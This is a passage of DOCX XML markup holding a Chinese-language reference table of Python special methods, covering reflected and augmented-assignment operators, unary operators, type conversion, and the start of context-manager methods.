        <w:t>__rfloordiv__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C58B27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rmod__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7833EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rdivmod__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306D065B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rpow__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6199A32E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rlshift__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E15F88C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rrshift__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BECEEBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rand__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EFD36" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rxor__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5794B777" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__ror__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4F2891" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD448CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增量赋值运算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF99957" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__iadd__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值加法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7C99A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__isub__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值减法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1EE5CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__imul__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值乘法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65628605" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__itruediv__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值真除法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC4F87" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__ifloordiv__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值整数除法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46439C20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__imod__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值取模算法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC9464D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__ipow__(self, other[, modulo])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值幂运算的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>**=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069AC72D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__ilshift__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值按位左移位的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;&lt;=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD7BC98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__irshift__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值按位右移位的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416B1CB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__iand__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值按位与操作的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453957F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__ixor__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值按位异或操作的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>^=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EFB2FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__ior__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义赋值按位或操作的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>|=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB23FBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A443FD5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一元操作符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47517FC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__pos__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义正号的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9F03DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__neg__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义负号的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B639BE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__abs__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> abs() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57601733" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__invert__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义按位求反的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C66E129" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8AF5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CCA24E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__complex__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> complex() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为（需要返回恰当的值）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B7F87" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__int__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> int() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为（需要返回恰当的值）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD814D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__float__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> float() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为（需要返回恰当的值）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3674D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__round__(self[, n])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> round() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为（需要返回恰当的值）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BEB27D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__index__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当对象是被应用在切片表达式中时，实现整形强制转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2441F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你定义了一个可能在切片时用到的定制的数值型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你应该定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __index__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C2383" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __index__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被定义，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __int__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也需要被定义，且返回相同的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B5904" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2D52E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上下文管理（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204920C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__enter__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句时的初始化行为</w:t>
      </w:r>
    </w:p>
